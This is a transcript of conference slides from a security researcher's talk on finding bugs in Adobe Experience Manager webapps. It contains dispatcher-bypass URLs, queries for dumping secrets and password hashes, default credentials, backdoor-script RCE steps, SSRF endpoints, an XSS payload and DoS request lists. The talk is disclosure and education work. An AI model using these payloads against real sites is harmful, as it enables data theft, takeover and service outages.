![Using CVE-2016-0957
# Deny content grabbing
/0081 { /type "deny" /url "*.infinity.json" }
/0082 { /type "deny" /url "*.tidy.json" }
/0083 { /type "deny" /url "*.sysview.xml" }
/0084 { /type "deny" /url "*.docview.json" }
/0085 { /type "deny" /url "*.docview.xml" }
/0086 { /type "deny" /url "*.*[0-9].json" }
# Deny query (and additional selectors)
/0090 { /type "deny" /url "*.query*.json" }
}
Policy dispatcher.any before CVE-2016-0957
20/110](https://image.slidesharecdn.com/mikahilegorov-181204133144/85/Mikhail-Egorov-Hunting-for-bugs-in-Adobe-Experience-Manager-webapps-20-320.jpg)
![New bypass technique
# Enable features
/0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization
# Deny content grabbing, on all accessible pages, using regular expressions
/0081
{
/type "deny"
/selectors '((sys|doc)view|query|[0-9-]+)’
/extension '(json|xml)’
}
Policy dispatcher.any after CVE-2016-0957
25/110](https://image.slidesharecdn.com/mikahilegorov-181204133144/85/Mikhail-Egorov-Hunting-for-bugs-in-Adobe-Experience-Manager-webapps-25-320.jpg)
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
- 1. Hunting for in AEM webapps Mikhail Egorov @0ang3el Budapest 2018
- 2. Mikhail Egorov, @0ang3el • Security researcher • Bug hunter (Bugcrowd, H1) • In Top 20 on Bugcrowd • Conference speaker • Hack In The Box • Troopers • ZeroNights • PHDays • https://twitter.com/0ang3el • https://www.slideshare.net/0ang3el • https://speakerdeck.com/0ang3el • https://github.com/0ang3el
- 3. Why this talk • AEM is an enterprise-grade CMS • AEM is widely used by high-profile companies! 3/110
- 4. Why this talk Companies that use AEM and has public Bug bounty or Vulnerability disclosure programs 4/110
- 5. Why this talk • Using whatruns.com I grabbed 9985 unique domains that use AEM • 5751 AEM installations were on https://domain-name or https://www.domain-name 5/110
- 6. Why this talk • AEM is big and complex => room for security bugs! • 26 known CVEs • Based on open source projects • Apache Felix • Apache Sling • Apache OAK JCR https://helpx.adobe.com/experience-manager/using/osgi_getting_started.html 6/110
- 7. Why this talk • New tools and techniques • Details for fresh CVEs 7/110
- 8. Previous work • PHDays 2015, @0ang3el • https://www.slideshare.net/0ang3el/hacking-aem-sites 8/110
- 9. Previous work • 2016, @darkarnium • http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote- Code-Execution-Write-Up.html 9/110
- 10. Previous work • SEC-T 2018, @fransrosen • https://speakerdeck.com/fransrosen/a-story-of-the-passive- aggressive-sysadmin-of-aem 10/110
- 11. Previous work • 2018, @JonathanBoumanium • https://medium.com/@jonathanbouman/reflected-xss-at-philips-com- e48bf8f9cd3c 11/110
- 12. All mentioned vulnerabilities were reported to resource owners or Adobe PSIRT and are fixed!!!
- 13. AEM deployment and AEM dispatcher
- 14. Common AEM deployment https://aemcorner.com/aem-common-deploy-models/ Main blocks: • Author AEM instance • Publish AEM instance • AEM dispatcher (~WAF) Interacts with Publish server via AEM Dispatcher! 4503/tcp 4502/tcp 443/tcp ? 14/110
- 15. AEM Dispatcher • Module for Web Server (Apache, IIS) • https://www.adobeaemcloud.com/content/companies/public/adobe/dispatcher/dispatcher. html • Provides security (~WAF) and caching layers 15/110
- 16. AEM Dispatcher • In theory … a front end system offers an extra layer of security to your Adobe Experience Manager infrastructure • In practice … it’s the only security layer!!! • Admins rarely keep all components on Publish updated and securely configured 16/110
- 17. AEM Dispatcher • Dispatcher bypasses allow to talk to those “insecure” components … and have LULZ 17/110
- 18. AEM Dispatcher bypasses • CVE-2016-0957 • New bypass technique(no details for now – not fixed ) • Add multiple slashes • SSRF • … 18/110
- 19. Using CVE-2016-0957 /filter { # Deny everything first and then allow specific entries /0001 { /type "deny" /glob "*" } /0023 { /type "allow" /url "/content*" } # disable this rule to allow mapped content only /0041 { /type "allow" /url "*.css" } # enable css /0042 { /type "allow" /url "*.gif" } # enable gifs /0043 { /type "allow" /url "*.ico" } # enable icos /0044 { /type "allow" /url "*.js" } # enable javascript /0045 { /type "allow" /url "*.png" } # enable png /0046 { /type "allow" /url "*.swf" } # enable flash /0047 { /type "allow" /url "*.jpg" } # enable jpg /0048 { /type "allow" /url "*.jpeg" } # enable jpeg /0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization Policy dispatcher.any before CVE-2016-0957 19/110
- 20. Using CVE-2016-0957 # Deny content grabbing /0081 { /type "deny" /url "*.infinity.json" } /0082 { /type "deny" /url "*.tidy.json" } /0083 { /type "deny" /url "*.sysview.xml" } /0084 { /type "deny" /url "*.docview.json" } /0085 { /type "deny" /url "*.docview.xml" } /0086 { /type "deny" /url "*.*[0-9].json" } # Deny query (and additional selectors) /0090 { /type "deny" /url "*.query*.json" } } Policy dispatcher.any before CVE-2016-0957 20/110
- 22. Using CVE-2016-0957 https://aemsite/bin/querybuilder.json https://aemsite/bin/querybuilder.json/a.css /0090 { /type "deny" /url "*.query*.json" } Last rule that matches the request is applied and has deny type! ahttps://aemsite/bin/querybuilder.json/a.png https://aemsite/bin/querybuilder.json;%0aa.css https://aemsite/bin/querybuilder.json/a.1.json Blocked 22/110
- 23. Using CVE-2016-0957 https://aemsite/bin/querybuilder.json/a.css https://aemsite/bin/querybuilder.json/a.css /0041 { /type "allow" /url "*.css" } # enable css Last rule that matches the request is applied and has allow type! ahttps://aemsite/bin/querybuilder.json/a.png https://aemsite/bin/querybuilder.json;%0aa.css https://aemsite/bin/querybuilder.json/a.1.json Allowed 23/110
- 24. New bypass technique /filter { # Deny everything first and then allow specific entries /0001 { /type "deny" /glob "*" } # Allow non-public content directories /0023 { /type "allow" /url "/content*" } # disable this rule to allow mapped content only # Enable extensions in non-public content directories, using a regular expression /0041 { /type "allow" /extension '(clientlibs|css|gif|ico|js|png|swf|jpe?g|woff2?)’ } Policy dispatcher.any after CVE-2016-0957 24/110
- 25. New bypass technique # Enable features /0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization # Deny content grabbing, on all accessible pages, using regular expressions /0081 { /type "deny" /selectors '((sys|doc)view|query|[0-9-]+)’ /extension '(json|xml)’ } Policy dispatcher.any after CVE-2016-0957 25/110
- 26. New bypass technique # Deny content grabbing for /content /0082 { /type "deny" /path "/content" /selectors '(feed|rss|pages|languages|blueprint|infinity|tidy)’ /extension '(json|xml|html)’ } } Policy dispatcher.any after CVE-2016-0957 26/110
- 27. New bypass technique https://aemsite/bin/querybuilder.json https://aemsite/bin/querybuilder.json/a.css https://aemsite/bin/querybuilder.json;%0aa.css Blocked 27/110 Sorry, details will be disclosed later!
- 28. Add multiple slashes • ///etc.json instead of /etc.json • ///bin///querybuilder.json instead of /bin/querybuilder.json 28/110
- 29. Using SSRF • We need SSRF in a component that is allowed by AEM dispatcher policy • Effective way to bypass AEM dispatcher! 29/110
- 30. Things to remember • Usually AEM dispatcher is the only security layer • Usually it’s easy to bypass AEM dispatcher • AEM admins usually fail to configure Publish instance securely and install updates timely … • Profit! 30/110
- 31. Quickly “sniff out” buggy AEM webapp
- 32. Get JSON with JCR node props /.json /.1.json /.childrenlist.json /.ext.json /.4.2.1...json /.json/a.css /.json/a.html /.json/a.png /.json/a.ico /.json;%0aa.css /content.json /content.1.json /content.childrenlist.json /content.ext.json /content.4.2.1...json /content.json/a.css /content.json/a.html /content.json/a.png /content.json/a.ico /content.json;%0aa.css /bin.json /bin.1.json /bin.childrenlist.json /bin.ext.json /bin.4.2.1...json /bin.json/a.css /bin.json/a.html /bin.json/a.png /bin.json/a.ico /bin.json;%0aa.css / /bin/content 32/110
- 33. Yea baby this is AEM https://<redacted>.twitter.com/.json https://<redacted>.twitter.com/.ext.json 33/110
- 35. Yea baby this is AEM https://<redacted>.adobe.com/system/sling/loginstatus.css https://www.<redacted>/system/bgservlets/test.json 35/110
- 36. Grabbing juicy data from JCR
- 37. What we can find • Everything is stored in JCR repository as node properties including: • Secrets (passwords, encryption keys, tokens) • Configuration • PII • Usernames 37/110
- 38. AEM servlets for grabbing loot • DefaultGetServlet • QueryBuilderJsonServlet • QueryBuilderFeedServlet • GQLSearchServlet • … 38/110
- 39. DefaultGetServlet • Allows to get JCR node with its props • Selectors • tidy • infinity • numeric value: -1, 0, 1 … 99999 • Formats • json • xml • res 39/110
- 40. DefaultGetServlet • Allows to get JCR node with its props • Selectors • tidy • infinity • numeric value: -1, 0, 1 … 99999 • Formats • json • xml • res good for retrieving files 40/110
- 41. DefaultGetServlet https://aem.site/.tidy.3.json jcr:root selector tidy selector depth output format Get JCR nodes with props starting from jcr:root with depth 3 and return formatted JSON 41/110
- 42. DefaultGetServlet – How to grab • Get node names, start from jcr:root • /.1.json • /.ext.json • /.childrenlist.json • Or guess node names: /content, /home, /var, /etc • Dump props for each child node of jcr:root • /content.json or /content.5.json or /content.-1.json 42/110
- 43. DefaultGetServlet – What to grab • Interesting nodes • /etc – may contain secrets (passwords, enc. keys, …) • /apps/system/config or /apps/<smth>/config (passwords, …) • /var – may contain private information (PII) • /home – password hashes, PII • Interesting props – contain AEM users names • jcr:createdBy • jcr:lastModifiedBy • cq:LastModifiedBy 43/110
- 44. DefaultGetServlet – In the wild P1 submission for private BB program - AEM webapp reveals DB passwords /etc/<redacted>/appsconfig.tidy.infinity.json/a.html 44/110
- 45. • We can search JCR using different predicates • https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder- predicate-reference.html • QueryBuilderJsonServlet allows to get Nodes and their Props (DefaultGetServlet on steroids) • QueryBuilderFeedServlet allows to get Nodes (no Props) • but we can use blind binary search for Props QueryBuilder: JsonServlet & FeedServlet 45/110
- 46. QueryBuilder: JsonServlet & FeedServlet ///bin///querybuilder.json ///bin///querybuilder.json.servlet ///bin///querybuilder.json/a.css ///bin///querybuilder.json.servlet/a.css ///bin///querybuilder.json/a.ico ///bin///querybuilder.json.servlet/a.ico ///bin///querybuilder.json;%0aa.css ///bin///querybuilder.json.servlet;%0aa.css ///bin///querybuilder.json/a.1.json ///bin///querybuilder.json.servlet/a.1.json ///bin///querybuilder.json.css ///bin///querybuilder.json.ico ///bin///querybuilder.json.html ///bin///querybuilder.json.png /bin/querybuilder.json ///bin///querybuilder.feed.servlet ///bin///querybuilder.feed.servlet/a.css ///bin///querybuilder.feed.servlet/a.ico ///bin///querybuilder.feed.servlet;%0aa.css ///bin///querybuilder.feed.servlet/a.1.json /bin/querybuilder.feed.servlet 46/110
- 47. Examples of useful searches • type=nt:file&nodename=*.zip • path=/home&p.hits=full&p.limit=-1 • hasPermission=jcr:write&path=/content • hasPermission=jcr:addChildNodes&path=/content • hasPermission=jcr:modifyProperties&path=/content • p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alast ModifiedBy&property.operation=unequals&property.value=admin&type=n t%3abase&p.limit=1000 • path=/etc&path.flat=true&p.nodedepth=0 • path=/etc/replication/agents.author&p.hits=full&p.nodedepth=-1 47/110
- 48. Examples of useful searches type=nt:file&nodename=*.zip P1 submission for private BB – grab prod config for Author server 48/110
- 49. path=/home&p.hits=full&p.limit=-1 P1 submission for private BB – grab AEM users hashed passwords Examples of useful searches 49/110
- 50. Examples of useful searches hasPermission=jcr:write&path=/content P2 submission for Twitter BB – Persistent XSS with CSP bypass Root cause: • /content/usergenerated/etc/commerce/smartlists was writable for anon user • POST servlet was accessible for anon user 50/110
- 51. Examples of useful searches p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3al astModifiedBy&property.operation=unequals&property.value=admin& type=nt%3abase&p.limit=1000 51/110
- 52. Examples of useful searches path=/etc&path.flat=true&p.nodedepth=0 path=/etc/cloudsettings&p.hits=full&p.nodedepth=-1 /etc.childrenlist.json /etc/cloudsettings.-1.json 52/110
- 53. GQLSearchServlet • GQL is a simple fulltext query language, similar to Lucene or Google queries • https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference- materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html • We can get Node names (not Props) • but we can use blind binary search for Props 53/110
- 55. GQLSearchServlet – examples of searches query=path:/etc%20type:base%20limit:..-1&pathPrefix= /etc.ext.infinity.json 55/110
- 56. Enum users & brute creds
- 57. Enum users • DefaultGetServlet or QueryBuilderJsonServlet • Default users • admin • author • … 57/110
- 58. Enum users • DefaultGetServlet or QueryBuilderJsonServlet • Default users • admin • author • … King of AEM Default password – admin 58/110
- 59. Enum users • DefaultGetServlet or QueryBuilderJsonServlet • Default users • admin • author • … Has jcr:write for /content Default password – author 59/110
- 60. Brute creds • AEM supports basic auth, no bruteforce protection! • LoginStatusServlet – /system/sling/loginstatus.json VS 60/110
- 62. P1 submission for Adobe VDP – Default admin creds Bugs in the wild 62/110
- 63. P1 submission for LinkedIn VDP – Weak passwords for some AEM users Bugs in the wild 63/110
- 65. Universal RCE variants • Uploading backdoor OSGI bundle • Requires admin and access to /system/console/bundles • https://github.com/0ang3el/aem-rce-bundle.git (works for AEM 6.2 or newer) • Uploading backdoor jsp script to /apps • Requires write access to /apps • Requires ability to invoke SlingPostServlet • https://sling.apache.org/documentation/getting-started/discover-sling-in-15-minutes.html • … 65/110
- 66. Generate skeleton for AEM bundle 66/110 mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate -DarchetypeGroupId=com.adobe.granite.archetypes -DarchetypeArtifactId=aem-project-archetype -DarchetypeVersion=11 -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/ mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate -DarchetypeGroupId=com.day.jcr.vault -DarchetypeArtifactId=multimodule-content-package-archetype -DarchetypeVersion=1.0.2 -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/ For AEM 6.2 For AEM 5.6
- 69. Uploading backdoor jsp script • Create node rcenode somewhere with property sling:resourceType=rcetype • Create node /apps/rcetype and upload html.jsp with payload to node • Open https://aem-site/rcenode.html?cmd=ifconfig and have LULZ • https://github.com/0ang3el/aem-hacker/blob/master/aem-rce-sling-script.sh 69/110
- 71. Server Side Request Forgery
- 72. SSRF in ReportingServicesProxyServlet CVE-2018-12809 • Versions: 6.0, 6.1, 6.2, 6.3, 6.4 • Allows to see the response • Leak secrets (IAM creds), RXSS (bypasses XSS filters), bypass dispatcher • https://helpx.adobe.com/security/products/experience-manager/apsb18-23.html /libs/cq/contentinsight/content/proxy.reportingservices.json /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet 72/110
- 74. SSRF in ReportingServicesProxyServlet P1 submission for private BB – Leak IAM role creds 74/110
- 75. SSRF in ReportingServicesProxyServlet P1 submission for private BB – Ex-filtrate secrets from /etc via SSRF 75/110
- 76. SSRF in ReportingServicesProxyServlet P2 submission for Adobe VDP – SSRF and RXSS 76/110
- 77. SSRF in SalesforceSecretServlet CVE-2018-5006 • Versions: 6.0, 6.1, 6.2, 6.3, 6.4 • Allows to see the response** • Leak secrets (IAM role creds), RXSS (bypasses XSS filters) • https://helpx.adobe.com/security/products/experience-manager/apsb18-23.html /libs/mcm/salesforce/customer.json ** - Servlet makes POST request to URL 77/110
- 79. SSRF in SalesforceSecretServlet P1 submission for Adobe VDP – Leak IAM role creds 79/110
- 80. SSRF in SalesforceSecretServlet P2 submission for private BB – SSRF and RXSS 80/110
- 81. SSRF in SiteCatalystServlet No CVE from Adobe PSIRT • Allows to blindly send POST requests • Allow to specify arbitrary HTTP headers via CRLF or LF injection • HTTP smuggling (works for Jetty) /libs/cq/analytics/components/sitecatalystpage/segments.json.servlet /libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json 81/110
- 82. SSRF in SiteCatalystServlet 82/110
- 84. SSRF in AutoProvisioningServlet No CVE from Adobe PSIRT • Allows to blindly send POST requests • Allow to inject arbitrary HTTP headers • HTTP smuggling (works for Jetty) /libs/cq/cloudservicesprovisioning/content/autoprovisioning.json 84/110
- 85. SSRF in AutoProvisioningServlet 85/110
- 87. SSRF to RCE • It’s possible to escalate 2 SSRFs to RCE on Publish server • Tested on AEM 6.2 before AEM-6.2-SP1-CFP7 fix pack • https://www.adobeaemcloud.com/content/marketplace/marketplaceProxy.html?pack agePath=/content/companies/public/adobe/packages/cq620/cumulativefixpack/AEM- 6.2-SP1-CFP7 87/110
- 88. SSRF to RCE • Topology is used by replication mechanisms in AEM • https://sling.apache.org/documentation/bundles/discovery-api-and-impl.html • https://helpx.adobe.com/experience-manager/kb/HowToUseReverseReplication.html • To join Topology PUT request must be sent to TopologyConnectorServlet • TopologyConnectorServlet is accessible on localhost only (default) • Via SSRF with HTTP smuggling we can access TopologyConnectorServlet 88/110
- 89. SSRF to RCE • When node joins the topology Reverse replication agent is created automatically • Reverse replication agent replicates nodes from malicious AEM server to Publish server … RCE! 89/110
- 91. <script> AEM XSS </script>
- 92. XSS variants • Create new node and upload SVG (jcr:write, jcr:addChildNodes) • Create new node property with XSS payload (jcr:modifyProperties) • SWF XSSes from @fransrosen • WCMDebugFilter XSS – CVE-2016-7882 • See Philips XSS case @JonathanBoumanium • Many servlets return HTML tags in JSON response 92/110
- 93. XSS variants • Create new node and upload SVG (jcr:write, jcr:addChildNodes) • Create new node property with XSS payload (jcr:modifyProperties) • SWF XSSes from @fransrosen • WCMDebugFilter XSS – CVE-2016-7882 • See Philips XSS case @JonathanBoumanium • Many servlets return HTML tags in JSON response Persistent 93/110
- 94. • Create new node and upload SVG (jcr:write, jcr:addChildNodes) • Create new node property with XSS payload (jcr:modifyProperties) • SWF XSSes from @fransrosen • WCMDebugFilter XSS – CVE-2016-7882 • See Philips XSS case @JonathanBoumanium • Many servlets return HTML tags in JSON response XSS variants Reflected 94/110
- 95. XSS variants • Create new node and upload SVG (jcr:write, jcr:addChildNodes) • Create new node property with XSS payload (jcr:modifyProperties) • SWF XSSes from @fransrosen • WCMDebugFilter XSS – CVE-2016-7882 • See Philips XSS case @JonathanBoumanium • Many servlets return HTML tags in JSON response 95/110
- 96. SuggestionHandler servlet • /bin/wcm/contentfinder/connector/suggestions.json • Reflects pre parameter in JSON response • What if Content-Type of response is based on file extension in URL: • /a.html 96/110
- 97. XSS variants P3 submission for private BB – Reflected XSS /bin/wcm/contentfinder/connector/suggestions.json/a.html?query_term=path%3a/&pre=%3Csvg+onloa d%3dalert(document.domain)%3E&post=yyyy 97/110
- 98. DoS attacks
- 99. DoS is easy • /.ext.infinity.json • /.ext.infinity.json?tidy=true • /bin/querybuilder.json?type=nt:base&p.limit=-1 • /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..- 1&pathPrefix= • /content.assetsearch.json?query=*&start=0&limit=10&random=123 • /..assetsearch.json?query=*&start=0&limit=10&random=123 • /system/bgservlets/test.json?cycles=999999&interval=0&flushEvery=1111 11111 99/110
- 101. Other tricks
- 102. ExternalJobPostServlet javadeser • Old bug, affects AEM 5.5 – 6.1 • http://aempodcast.com/2016/podcast/aem-podcast-java-deserialization- bug/ • /libs/dam/cloud/proxy.json • Parameter file accepts Java serialized stream and passes to ObjectInputStream.readObject() 102/110
- 103. ExternalJobPostServlet javadeser Payload from oisdos tool 103/110
- 105. XXE via webdav • Old bug, CVE-2015-1833 • It’s possible to read local files with PROPFIND/PROPPATCH • https://www.slideshare.net/0ang3el/what-should-a-hacker-know-about- webdav 105/110
- 106. XXE via webdav – webdav support is on? • Send OPTIONS request • Allow headers in response contain webdav-related methods • Navigate to /crx/repository/ • 401 HTTP and WWW-Authenticate: Basic realm="Adobe CRX WebDAV" 106/110
- 107. AEM hacker toolset
- 108. AEM hacker toolset •https://github.com/0ang3el/aem-hacker.git • aem-hacker.py • aem-rce-sling-script.sh • aem-rce-ssrf.py • evil-aem.py & response.bin • You need VPS to run aem-hacker.py 108/110
- 109. AEM hacker toolset – aem-hacker.py • Sensitive nodes exposure via DefaultGetServlet (/apps, /etc, /home, /var) • QueryByulderJsonServlet & QueryByulderFeedServlet & GQLSearchServlet exposure • PostServlet exposure • SSRFs checks • LoginStatusServlet & default creds check • SWF XSSes • WCMDebugFilter XSS • SuggestionHandler XSS • Log records exposure via AuditLogServlet • ExternalJobPostServlet javadeser • … 109/110
- 110. THANK U! @0ang3el